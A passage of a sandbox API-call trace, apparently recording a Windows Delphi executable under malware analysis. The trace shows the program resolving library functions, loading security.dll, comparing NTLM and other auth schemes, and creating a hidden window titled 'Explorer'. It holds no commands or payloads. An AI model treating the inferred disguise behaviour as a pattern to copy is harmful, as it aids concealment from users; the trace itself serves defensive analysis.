lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0281.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollInfo", cchWideChar=20, lpMultiByteStr=0x635fa9c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollInfo", lpUsedDefaultChar=0x0) returned 20 [0281.541] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_GetScrollInfo") returned 0x74d108b6 [0281.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollPos", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0281.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollPos", cchWideChar=19, lpMultiByteStr=0x635fa9c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollPos", lpUsedDefaultChar=0x0) returned 19 [0281.541] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_GetScrollPos") returned 0x74d6f80e [0281.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollPos", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0281.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollPos", cchWideChar=19, lpMultiByteStr=0x635fa9c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollPos", lpUsedDefaultChar=0x0) returned 19 [0281.542] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_SetScrollPos") returned 0x74d10894 [0281.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollInfo", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0281.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollInfo", cchWideChar=20, lpMultiByteStr=0x635fa9c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollInfo", lpUsedDefaultChar=0x0) returned 20 [0281.542] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_SetScrollInfo") returned 0x74d108c7 [0281.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollRange", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0281.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollRange", cchWideChar=21, lpMultiByteStr=0x635fa9c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollRange", lpUsedDefaultChar=0x0) returned 21 [0281.543] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_SetScrollRange") returned 0x74d108a5 [0281.543] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76270000 [0281.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetLayeredWindowAttributes", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0281.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetLayeredWindowAttributes", cchWideChar=26, lpMultiByteStr=0x6366abc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetLayeredWindowAttributes", lpUsedDefaultChar=0x0) returned 26 [0281.544] GetProcAddress (hModule=0x76270000, lpProcName="SetLayeredWindowAttributes") returned 0x7627a6dc [0281.544] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0be [0281.544] GetModuleHandleW (lpModuleName="USER32.DLL") returned 0x76270000 [0281.544] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsHungAppWindow", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0281.544] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsHungAppWindow", cchWideChar=15, lpMultiByteStr=0x6349e7c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsHungAppWindow", lpUsedDefaultChar=0x0) returned 15 [0281.545] GetProcAddress (hModule=0x76270000, lpProcName="IsHungAppWindow") returned 0x762a7195 [0281.545] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HungWindowFromGhostWindow", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0281.545] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HungWindowFromGhostWindow", cchWideChar=25, lpMultiByteStr=0x6366abc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HungWindowFromGhostWindow", lpUsedDefaultChar=0x0) returned 25 [0281.545] GetProcAddress (hModule=0x76270000, lpProcName="HungWindowFromGhostWindow") returned 0x762961f5 [0281.545] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GhostWindowFromHungWindow", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0281.545] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GhostWindowFromHungWindow", cchWideChar=25, lpMultiByteStr=0x6366abc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GhostWindowFromHungWindow", lpUsedDefaultChar=0x0) returned 25 [0281.546] GetProcAddress (hModule=0x76270000, lpProcName="GhostWindowFromHungWindow") returned 0x7627a561 [0281.546] LoadStringW (in: hInstance=0x5fc0000, uID=0xff13, lpBuffer=0x534d8f0, cchBufferMax=4096 | out: lpBuffer="Metafiles") returned 0x9 [0281.546] CharLowerBuffW (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3 [0281.546] LoadStringW (in: hInstance=0x5fc0000, uID=0xff14, lpBuffer=0x534d8f0, cchBufferMax=4096 | out: lpBuffer="Enhanced Metafiles") returned 0x12 [0281.546] CharLowerBuffW (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3 [0281.546] LoadStringW (in: hInstance=0x5fc0000, uID=0xff15, lpBuffer=0x534d8f0, cchBufferMax=4096 | out: lpBuffer="Icons") returned 0x5 [0281.546] CharLowerBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0281.546] LoadStringW (in: hInstance=0x5fc0000, uID=0xff17, lpBuffer=0x534d8f0, cchBufferMax=4096 | out: lpBuffer="TIFF Images") returned 0xb [0281.546] CharLowerBuffW (in: lpsz="tiff", cchLength=0x4 | out: lpsz="tiff") returned 0x4 [0281.546] LoadStringW (in: hInstance=0x5fc0000, uID=0xff17, lpBuffer=0x534d8f0, cchBufferMax=4096 | out: lpBuffer="TIFF Images") returned 0xb [0281.546] CharLowerBuffW (in: lpsz="tif", cchLength=0x3 | out: lpsz="tif") returned 0x3 [0281.546] LoadStringW (in: hInstance=0x5fc0000, uID=0xff16, lpBuffer=0x534d8f0, cchBufferMax=4096 | out: lpBuffer="Bitmaps") returned 0x7 [0281.546] CharLowerBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3 [0281.546] SetErrorMode (uMode=0x8000) returned 0x1 [0281.546] LoadLibraryW (lpLibFileName="olepro32.dll") returned 0x73280000 [0281.570] SetErrorMode (uMode=0x1) returned 0x8000 [0281.570] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreatePropertyFrame", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0281.570] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreatePropertyFrame", cchWideChar=22, lpMultiByteStr=0x635fb8c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OleCreatePropertyFrame", lpUsedDefaultChar=0x0) returned 22 [0281.570] GetProcAddress (hModule=0x73280000, lpProcName="OleCreatePropertyFrame") returned 0x732820ea [0281.570] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreateFontIndirect", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0281.570] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreateFontIndirect", cchWideChar=21, lpMultiByteStr=0x635fb8c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OleCreateFontIndirect", lpUsedDefaultChar=0x0) returned 21 [0281.571] GetProcAddress (hModule=0x73280000, lpProcName="OleCreateFontIndirect") returned 0x732820b7 [0281.571] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreatePictureIndirect", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0281.571] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleCreatePictureIndirect", cchWideChar=24, lpMultiByteStr=0x6366abc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OleCreatePictureIndirect", lpUsedDefaultChar=0x0) returned 24 [0281.571] GetProcAddress (hModule=0x73280000, lpProcName="OleCreatePictureIndirect") returned 0x732820c8 [0281.571] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleLoadPicture", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0281.571] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OleLoadPicture", cchWideChar=14, lpMultiByteStr=0x6349edc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OleLoadPicture", lpUsedDefaultChar=0x0) returned 14 [0281.571] GetProcAddress (hModule=0x73280000, lpProcName="OleLoadPicture") returned 0x732820d9 [0281.572] GetCurrentThreadId () returned 0x62c [0281.572] GetCurrentThreadId () returned 0x62c [0281.572] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0281.572] CharLowerBuffW (in: lpsz="TComponent", cchLength=0xa | out: lpsz="tcomponent") returned 0xa [0281.572] GetCurrentThreadId () returned 0x62c [0281.572] GetCurrentThreadId () returned 0x62c [0281.572] GetCurrentThreadId () returned 0x62c [0281.572] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0281.572] CharLowerBuffW (in: lpsz="TComponent", cchLength=0xa | out: lpsz="tcomponent") returned 0xa [0281.572] GetCurrentThreadId () returned 0x62c [0281.572] GetDC (hWnd=0x0) returned 0xc01016e [0281.572] GetDeviceCaps (hdc=0xc01016e, index=12) returned 32 [0281.572] GetDeviceCaps (hdc=0xc01016e, index=14) returned 1 [0281.572] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0281.572] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeda, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="JPEG Image File") returned 0xf [0281.572] CharLowerBuffW (in: lpsz="jpeg", cchLength=0x4 | out: lpsz="jpeg") returned 0x4 [0281.572] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeda, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="JPEG Image File") returned 0xf [0281.572] CharLowerBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="jpg") returned 0x3 [0281.573] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x77780000 [0281.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileSizeEx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0281.573] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetFileSizeEx", cchWideChar=13, lpMultiByteStr=0x6349efc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetFileSizeEx", lpUsedDefaultChar=0x0) returned 13 [0281.573] GetProcAddress (hModule=0x77780000, lpProcName="GetFileSizeEx") returned 0x777c59ef [0281.573] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x3430000 [0281.574] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x630842c | out: lpBuffer="C:\\Users\\DSSDPM~1\\AppData\\Local\\Temp\\") returned 0x25 [0281.574] LoadStringW (in: hInstance=0x5fc0000, uID=0xfec9, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0281.574] LoadStringW (in: hInstance=0x5fc0000, uID=0xfec9, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0281.574] LoadStringW (in: hInstance=0x5fc0000, uID=0xfec9, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0281.574] LoadStringW (in: hInstance=0x5fc0000, uID=0xfec9, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="%s") returned 0x2 [0281.574] LoadStringW (in: hInstance=0x5fc0000, uID=0xfec8, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Disconnected.") returned 0xd [0281.574] LoadStringW (in: hInstance=0x5fc0000, uID=0xfec7, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Disconnecting.") returned 0xe [0281.574] LoadStringW (in: hInstance=0x5fc0000, uID=0xfec6, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Connected.") returned 0xa [0281.574] LoadStringW (in: hInstance=0x5fc0000, uID=0xfec5, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Connecting to %s.") returned 0x11 [0281.574] LoadStringW (in: hInstance=0x5fc0000, uID=0xfec4, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Resolving hostname %s.") returned 0x16 [0281.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Basic", cchCount1=5, lpString2="NTLM", cchCount2=4) returned 1 [0281.574] SetErrorMode (uMode=0x8000) returned 0x1 [0281.574] LoadLibraryW (lpLibFileName="security.dll") returned 0x73270000 [0281.592] SetErrorMode (uMode=0x1) returned 0x8000 [0281.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitSecurityInterfaceW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0281.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitSecurityInterfaceW", cchWideChar=22, lpMultiByteStr=0x635fc54, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitSecurityInterfaceW", lpUsedDefaultChar=0x0) returned 22 [0281.592] GetProcAddress (hModule=0x73270000, lpProcName="InitSecurityInterfaceW") returned 0x75be5b53 [0281.593] InitSecurityInterfaceW () returned 0x75bf8300 [0281.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Basic", cchCount1=5, lpString2="NTLM", cchCount2=4) returned 1 [0281.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTLM", cchCount1=4, lpString2="NTLM", cchCount2=4) returned 2 [0281.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Basic", cchCount1=5, lpString2="Negotiate", cchCount2=9) returned 1 [0281.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTLM", cchCount1=4, lpString2="Negotiate", cchCount2=9) returned 3 [0281.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Basic", cchCount1=5, lpString2="Digest", cchCount2=6) returned 1 [0281.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTLM", cchCount1=4, lpString2="Digest", cchCount2=6) returned 3 [0281.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Negotiate", cchCount1=9, lpString2="Digest", cchCount2=6) returned 3 [0281.593] GetCurrentThreadId () returned 0x62c [0281.593] GetCurrentThreadId () returned 0x62c [0281.593] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0281.593] CharLowerBuffW (in: lpsz="TComponent", cchLength=0xa | out: lpsz="tcomponent") returned 0xa [0281.593] GetCurrentThreadId () returned 0x62c [0281.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f80d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ü\x98\x13I\x0bÞ\x0e´àí\x90¬|ƾƾ¬|\x0e6eo7\x07\x9b²\x981\x1dǦã\x183¢×ø¼", lpUsedDefaultChar=0x0) returned 0 [0281.594] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TApplication", lpWndClass=0x534f968 | out: lpWndClass=0x534f968) returned 0 [0281.594] RegisterClassW (lpWndClass=0x6208f70) returned 0xc0f3 [0281.594] GetSystemMetrics (nIndex=0) returned 1440 [0281.594] GetSystemMetrics (nIndex=1) returned 900 [0281.594] CreateWindowExW (dwExStyle=0x80, lpClassName="TApplication", lpWindowName="Explorer", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10110 [0281.595] LoadLibraryA (lpLibFileName="wtsapi32.dll") returned 0x74690000 [0281.595] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2fe1598 [0281.595] GetProcAddress (hModule=0x74690000, lpProcName="WTSRegisterSessionNotification") returned 0x74691cbc [0281.596] WTSRegisterSessionNotification (hWnd=0x10110, dwFlags=0x0) returned 1 [0281.596] LoadLibraryA (lpLibFileName="uxtheme.dll") returned 0x74b10000 [0281.596] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2fe1348 [0281.596] GetProcAddress (hModule=0x74b10000, lpProcName="BufferedPaintInit") returned 0x74b1940e [0281.596] BufferedPaintInit () returned 0x0 [0281.596] SetWindowLongW (hWnd=0x10110, nIndex=-4, dwNewLong=54661077) returned 100465804 [0281.597] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0281.597] SendMessageW (hWnd=0x10110, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0281.597] DefWindowProcW (hWnd=0x10110, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0281.602] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0281.602] SetClassLongW (hWnd=0x10110, nIndex=-14, dwNewLong=65575) returned 0x0 [0281.603] GetSystemMenu (hWnd=0x10110, bRevert=0) returned 0x10145 [0281.603] DeleteMenu (hMenu=0x10145, uPosition=0xf030, uFlags=0x0) returned 1 [0281.603] DeleteMenu (hMenu=0x10145, uPosition=0xf000, uFlags=0x0) returned 1 [0281.603] DeleteMenu (hMenu=0x10145, uPosition=0xf010, uFlags=0x0) returned 1 [0281.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f79d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.604] GetCurrentThreadId () returned 0x62c [0281.604] ResetEvent (hEvent=0x824) returned 1 [0281.604] GetCurrentThreadId () returned 0x62c [0281.604] GetCurrentThreadId () returned 0x62c [0281.604] GetCurrentThreadId () returned 0x62c [0281.604] ResetEvent (hEvent=0x824) returned 1 [0281.604] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534f880, fWinIni=0x0 | out: pvParam=0x534f880) returned 1 [0281.604] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534f880, fWinIni=0x0 | out: pvParam=0x534f880) returned 1 [0281.604] GetSystemMetrics (nIndex=49) returned 16 [0281.604] GetSystemMetrics (nIndex=50) returned 16 [0281.604] GetCurrentThreadId () returned 0x62c [0281.604] GetCurrentThreadId () returned 0x62c [0281.604] GetCurrentThreadId () returned 0x62c [0281.604] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534f8c8, fWinIni=0x0 | out: pvParam=0x534f8c8) returned 1 [0281.605] IsWindowVisible (hWnd=0x10110) returned 0 [0281.605] GetCurrentThreadId () returned 0x62c [0281.605] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x61da33d, cbMultiByte=10, lpWideCharStr=0x635fdbc, cchWideChar=11 | out: lpWideCharStr="TFrmMwM41n") returned 10 [0281.605] VirtualQuery (in: lpAddress=0x61d9e80, lpBuffer=0x534f88c, dwLength=0x1c | out: lpBuffer=0x534f88c*(BaseAddress=0x61d9000, AllocationBase=0x5fc0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0281.606] FindResourceW (hModule=0x5fc0000, lpName="TFrmMwM41n", lpType=0xa) returned 0x624ea90 [0281.606] FindResourceW (hModule=0x5fc0000, lpName="TFrmMwM41n", lpType=0xa) returned 0x624ea90 [0281.606] LoadResource (hModule=0x5fc0000, hResInfo=0x624ea90) returned 0x625a9ec [0281.606] SizeofResource (hModule=0x5fc0000, hResInfo=0x624ea90) returned 0x71c [0281.606] LockResource (hResData=0x625a9ec) returned 0x625a9ec [0281.606] GetCurrentThreadId () returned 0x62c [0281.606] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x534f798 | out: lpCPInfo=0x534f798) returned 1 [0281.606] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351590, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0281.606] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351590, cbMultiByte=10, lpWideCharStr=0x634a138, cchWideChar=10 | out: lpWideCharStr="TFrmMwM41n") returned 10 [0281.606] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351590, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0281.606] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351590, cbMultiByte=9, lpWideCharStr=0x634a138, cchWideChar=9 | out: lpWideCharStr="FrmMwM41nn") returned 9 [0281.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f6b1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FrmMwM41n", cchWideChar=9, lpMultiByteStr=0x534f6b1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FrmMwM41nóu\x90\x155\x06\x09", lpUsedDefaultChar=0x0) returned 9 [0281.606] GetCurrentThreadId () returned 0x62c [0281.606] GetCurrentThreadId () returned 0x62c [0281.606] GetCurrentThreadId () returned 0x62c [0281.606] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63584d8, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.606] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63584d8, cbMultiByte=4, lpWideCharStr=0x63515c0, cchWideChar=4 | out: lpWideCharStr="Left") returned 4 [0281.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a17c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Left", lpUsedDefaultChar=0x0) returned 4 [0281.607] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534f630, fWinIni=0x0 | out: pvParam=0x534f630) returned 1 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63584d8, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63584d8, cbMultiByte=3, lpWideCharStr=0x63515c0, cchWideChar=3 | out: lpWideCharStr="Topt") returned 3 [0281.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a15c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.607] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534f630, fWinIni=0x0 | out: pvParam=0x534f630) returned 1 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515d8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515d8, cbMultiByte=7, lpWideCharStr=0x634a158, cchWideChar=7 | out: lpWideCharStr="Caption") returned 7 [0281.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Caption", cchWideChar=7, lpMultiByteStr=0x635feac, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Caption", lpUsedDefaultChar=0x0) returned 7 [0281.607] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x63515c0, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0281.607] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x63515c0, cbMultiByte=9, lpWideCharStr=0x634a178, cchWideChar=9 | out: lpWideCharStr="FrmMwM41n") returned 9 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=12, lpWideCharStr=0x635fea8, cchWideChar=12 | out: lpWideCharStr="ClientHeight") returned 12 [0281.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ClientHeight", cchWideChar=12, lpMultiByteStr=0x637c454, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClientHeight", lpUsedDefaultChar=0x0) returned 12 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: 